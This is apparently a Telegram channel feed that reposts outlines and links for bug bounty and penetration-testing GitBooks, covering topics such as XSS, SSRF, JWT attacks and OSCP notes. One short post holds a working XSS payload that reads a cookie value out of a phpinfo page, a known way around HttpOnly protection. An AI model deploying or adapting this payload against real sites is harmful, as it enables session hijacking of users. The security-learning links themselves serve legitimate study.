Bug Bounty - GitBook
Everything 4 bug bounty https://t.me/GiftWay32robot?start=_tgr_HwZ24DI5MWJk
Repost from Bug Bounty - GitBook
WhoAmI Writeup
•Web Cache Poisoning
•Came looking for SSRF and found XSS
•Phishing Attack using Machine Learning model
•JWT Attacks
•OAuth - Mechanism and Attacks
•Upgrade plan from Free to Paid via Response Manipulation
•XSS IN SOQL Console
•Journey from Automated Discovery to Manual Exploitation
Link 🔗:-
https://ibraradi.gitbook.io/write-up/
@GitBook_s
Repost from Bug Bounty - GitBook
Infosec Blog
•Web Application Findings
•Recon automation, tips and tricks
•Hack The Box Machines
•CTF Challenges
•Red Teaming Tips & Tricks
•Cloud Security
Link 🔗:-
https://eslam3kl.gitbook.io/blog/
@GitBook_s
Repost from Bug Bounty - GitBook
Bug Hunter Handbook
•Getting Started in InfoSec and Bug Bounties
•Presentations
•Checklists / Guides
•Useful Twitter Threads
•List of Vulnerabilities
•API Security
•Mobile Security
•Fuzzing / Wordlists
•BugBounty Short Write-ups
•Burp Suite Tips and Tricks
•HackerOne Reports
•Response Manipulation
•Client Vs Server Side Vulnerabilities
•AWS
•Chaining of Bugs
•Bug Bounty Automation
•Mindmaps
•Oneliner Collections
•Red Teaming
•Blue Teaming
•Recon One Liners
•Containers
•Wordpress
•Fuzzing / FuFF
•OWASP ZAP
•Bug List
•Setting up burp collaborator
•Admin Panel PwN
•Credential Stuffing / Dump / HaveibeenPwned?
•Tools Required
•Nuclei Template
Link 🔗:-
gowthams.gitbook.io/bughunter-handbook
@GitBook_s
To support the channel, send the last post to groups.
x=new XMLHttpRequest();
x.open('GET','//host/phpinfo',0);
x.send();rx=/COOKIE'.*v">(.*?)</;
alert(x.responseText.match(rx)[1]);
#XSS
@GitBook_s
Guys, how are the gitbooks? Do you like them? If you have any comments about them, please write to me.
The reason I forward this is that some people never look at the beginning of the channel at all.
Repost from Bug Bounty - GitBook
📖
Pentest Book by n3t_hunt3r
XSS Filter Evasion and WAF Bypassing Tactics
Cloud Pentesting
Web App Pentesting
Link 🔗:-
https://n3t-hunt3r.gitbook.io/
@GitBook_s
Repost from Bug Bounty - GitBook
Pentest Book
Recon
Enumeration
Exploitation
Post Exploitation
Mobile
Others
Link 🔗:-
http://six2dez.gitbook.io
@GitBook_s
Repost from Bug Bounty - GitBook
Breaking Bits
Vulnerability Discovery
CTF
Firmware Emulator
Exploit Development
Link 🔗:-
https://breaking-bits.gitbook.io/
@GitBook_s
Repost from Bug Bounty - GitBook
Pentest Everything
🚩Writeups
Everything
Resources
Link 🔗:-
https://viperone.gitbook.io
@GitBook_s
Repost from Bug Bounty - GitBook
Application Security Cheat Sheet
Android Application
CI/CD
Cloud
Container
Framework
Linux
iOS Application
Resources
Web Application
Link 🔗:-
https://0xn3va.gitbook.io/cheat-sheets
@GitBook_s
Repost from Bug Bounty - GitBook
bounty
Account Takeover Methodology
Application Level DoS
Authentication Bypass
Broken-Link Hijacking
Broken Auth And Session Management
CMS
CORS
CSRF
Finding CVEs
CheckList
Web Page Source Code Review
EXIF Geo Data Not Stripped
File Upload Bypass
Find Origin IP
GraphQL
HTTP Desync Attack
Host-Header Attack
HTML-Injection
IDOR
JWT ATTACK
MFA Bypass
Misconfigurations
OAuth
Open Redirection
Parameter Pollution
Password Reset Functionality
Rate Limit
Recon
SQLi
SSRF
SSTI
Sign Up Functionality
Sensitive Info Leaks
Status Code Bypass
Subdomain Takeover
Tabnabbing
WAF Bypasses
Weak Password Policy
XSS
XXE
Link 🔗:-
https://mjn.gitbook.io
@GitBook_s
Repost from Bug Bounty - GitBook
OSCP Notes
Port Scanning
Services Enumeration
Web / HTTP
password attacks
Exploitation
shell
Linux Post Exploitation
windows post exploitation
file transfer
cheatsheets
Link 🔗:-
https://gabb4r.gitbook.io/oscp-notes/
@GitBook_s
Cross-Site WebSocket Hijacking Exploitation in 2025 - Include Security Research Blog
https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/
